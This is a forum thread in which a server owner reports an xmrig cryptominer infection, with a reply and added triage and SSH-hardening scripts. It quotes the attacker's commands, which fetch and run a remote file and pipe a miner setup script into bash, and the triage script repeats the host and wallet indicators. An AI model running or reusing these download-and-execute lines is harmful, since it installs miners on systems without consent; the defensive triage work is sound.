Bitcoin miner hack

I have a Linode protected by ufw and fail2ban, but someone managed to hack it, get in as a non-sudo user, and install the xmrig bitcoin miner. A couple of scripts were executed (see below); the one that has me worried is "java-update.rar". The only info I could find on this stuff is on Threatbook, in Chinese: https://bit.ly/3dMcicX

Does anyone have any advice on this? I'm inclined to rebuild the server.

Executed script:

cd /tmp
curl -OL http://tiktok.wenkaisb.info/java-update.rar;chmod 777 java-update.rar;./java-update.rar
curl -s -L http://tiktok.wenkaisb.info/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 853P6jv8Npp5nV1as3w9Td7Kaoy9CBtS12Cz2ive7KjMHCijrpwMipQDom1GSPej1UQ38TYbesnDafieGZv76JrGGVAVsAr

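An added triage script, not part of the original post: it greps for the indicators that are visible in the executed script above (the download host, the two file names, the xmrig / c3pool miner and the wallet address) across the places a miner usually leaves traces (process list, crontabs, /tmp, shell history, open sockets). The three SAMPLE_* inputs are constructed for the example so it runs offline; `--live` runs the same checks on the current host. The function names, the sample file paths and the `www` user are assumptions.

```bash
#!/usr/bin/env bash
# Added triage example (not from the original post). Indicators come from the
# script quoted in the thread; SAMPLE_* inputs are constructed, not captures.
set -u

# Indicators taken verbatim from the thread; extend as you learn more.
IOC_PATTERNS='tiktok\.wenkaisb\.info|java-update\.rar|setup_c3pool_miner|xmrig|c3pool|853P6jv8Npp5nV1as3w9Td7Kaoy9CBtS12Cz2ive7KjMHCijrpwMipQDom1GSPej1UQ38TYbesnDafieGZv76JrGGVAVsAr'

# count_hits < text : print how many input lines contain an indicator (0 if none).
count_hits() {
  grep -E -i -c "$IOC_PATTERNS" || true
}

# scan_text LABEL < text : print matching lines tagged with LABEL;
# returns 0 if anything matched, 1 if the input was clean.
scan_text() {
  local label=$1 hits
  hits=$(grep -E -i "$IOC_PATTERNS" || true)
  [ -n "$hits" ] || return 1
  printf '%s\n' "$hits" | sed "s/^/[$label] /"
}

# triage_live : run the same checks on this host (root needed to read every
# user's crontab). A rootkit can lie to ps and ls, so treat this as a way to
# record what you found before the rebuild, not as proof the box is clean.
triage_live() {
  ps -eo user,pid,pcpu,args 2>/dev/null | scan_text ps || true
  cat /var/spool/cron/crontabs/* /var/spool/cron/* /etc/crontab /etc/cron.d/* 2>/dev/null | scan_text cron || true
  ls -la /tmp /var/tmp /dev/shm 2>/dev/null | scan_text tmp || true
  cat /home/*/.bash_history /root/.bash_history 2>/dev/null | scan_text history || true
  ss -tnp 2>/dev/null | scan_text net || true
}

# Constructed samples (assumed paths and user), showing what a hit looks like.
SAMPLE_PS='USER     PID %CPU COMMAND
root       1  0.0 /sbin/init
www     4321 97.3 /home/www/c3pool/xmrig --config=/home/www/c3pool/config.json
www     4400  0.0 -bash'

SAMPLE_CRON='@reboot /home/www/c3pool/xmrig --config=/home/www/c3pool/config.json
0 3 * * * /usr/bin/certbot renew'

SAMPLE_HISTORY='cd /tmp
curl -OL http://tiktok.wenkaisb.info/java-update.rar;chmod 777 java-update.rar;./java-update.rar
ls -la'

if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_PS"      | scan_text ps      || echo "[ps] clean"
  printf '%s\n' "$SAMPLE_CRON"    | scan_text cron    || echo "[cron] clean"
  printf '%s\n' "$SAMPLE_HISTORY" | scan_text history || echo "[history] clean"
elif [ "${1:-}" = "--live" ]; then
  triage_live
fi
```

Run it with `--demo` to see the tagged hits from the constructed samples, or with `--live` (as root) on the compromised box before you wipe it. The high CPU on the xmrig line is the usual first tell; the cron `@reboot` entry is how the miner survives a restart, and the history line shows the initial download, which is what you want to keep (together with web server logs for the same timestamp) to work out which application let the attacker run commands as that user.
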
1 Reply

Hi,
You should rebuild your server and start over; take a look at this guide, which explains how to deal with such a situation.

I would also recommend that you only allow logins authenticated by SSH keys, password-protected ones. You could even take that a step further and set up something simple like a WireGuard VPN that only you can access, logging in to your Linode from only that IP address and disabling public SSH access.

If you run any website software that has any type of control panel or API, something like that could allow remote code execution, so check any CMS or other software you may be running for vulnerabilities, and upgrade it or use another content management system.

There are a lot of tips on securing your Linode that could be useful to you. Hopefully those will help as well.

Good luck!

Blake

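An added example for the two recommendations in the reply (key-only SSH, and SSH reachable only over a WireGuard VPN); it is not code from the original thread. `audit_sshd` checks an sshd_config text the way sshd reads it (first occurrence of a keyword wins, only the global section before the first `Match` block counts, OpenSSH defaults apply when a keyword is absent), and `ufw_vpn_only_ssh` prints the ufw commands that keep the WireGuard port public while restricting port 22 to the VPN subnet. The subnet 10.8.0.0/24, port 51820, the user `blake` and both sample configs are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not part of the original reply. Subnet, port and the two
# sample sshd_config texts below are assumptions made for the demo.
set -u

# sshd_value CONFIG_TEXT KEYWORD DEFAULT : effective value of KEYWORD, or
# DEFAULT when the keyword is absent or present only as a comment.
sshd_value() {
  local val
  val=$(printf '%s\n' "$1" | awk -v k="$2" '
      tolower($1) == "match"      { exit }              # global section ends here
      tolower($1) == tolower(k)   { print $2; exit }    # first occurrence wins
  ')
  printf '%s\n' "${val:-$3}"
}

# audit_sshd CONFIG_TEXT : print ok/FAIL per setting; return the number of
# failures. Defaults are OpenSSH's own. Older releases spell
# KbdInteractiveAuthentication as ChallengeResponseAuthentication.
audit_sshd() {
  local cfg=$1 fails=0 kw def want got
  while read -r kw def want; do
    got=$(sshd_value "$cfg" "$kw" "$def" | tr 'A-Z' 'a-z')
    if [ "$got" = "$want" ]; then
      printf 'ok   %s %s\n' "$kw" "$got"
    else
      printf 'FAIL %s is %s, want %s\n' "$kw" "$got" "$want"
      fails=$((fails + 1))
    fi
  done <<EOF
PasswordAuthentication yes no
KbdInteractiveAuthentication yes no
PermitRootLogin prohibit-password no
PubkeyAuthentication yes yes
EOF
  return "$fails"
}

# ufw_vpn_only_ssh WG_SUBNET [WG_PORT] : ufw commands that keep the WireGuard
# port public, allow SSH only from the VPN subnet and drop the public SSH rule.
ufw_vpn_only_ssh() {
  local subnet=$1 wgport=${2:-51820}
  cat <<EOF
ufw allow ${wgport}/udp comment 'WireGuard'
ufw allow from ${subnet} to any port 22 proto tcp comment 'SSH over VPN only'
ufw delete allow OpenSSH
ufw delete allow 22/tcp
EOF
}

# Constructed samples. The weak one mirrors a stock file: PasswordAuthentication
# appears only as a comment, so sshd's default (yes) applies, and the Match
# block for one user does not change that for everyone else.
WEAK_SSHD='Port 22
#PasswordAuthentication yes
PermitRootLogin yes
Match User deploy
    PasswordAuthentication no'

HARDENED_SSHD='Port 22
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin no
AllowUsers blake'

if [ "${1:-}" = "--demo" ]; then
  echo "== weak =="; audit_sshd "$WEAK_SSHD" || true
  echo "== hardened =="; audit_sshd "$HARDENED_SSHD" || true
  echo "== ufw =="; ufw_vpn_only_ssh 10.8.0.0/24
fi
```

To audit the real file, run `audit_sshd "$(sshd -T)"` rather than feeding `/etc/ssh/sshd_config` directly: `sshd -T` prints the effective configuration with `Include` files (for example `/etc/ssh/sshd_config.d/*.conf` on recent Ubuntu) already resolved, which the text-only check above does not follow. Apply the ufw rules only from a session that is itself coming in over the VPN, and keep an out-of-band console open, because the last two commands remove the only other way in.
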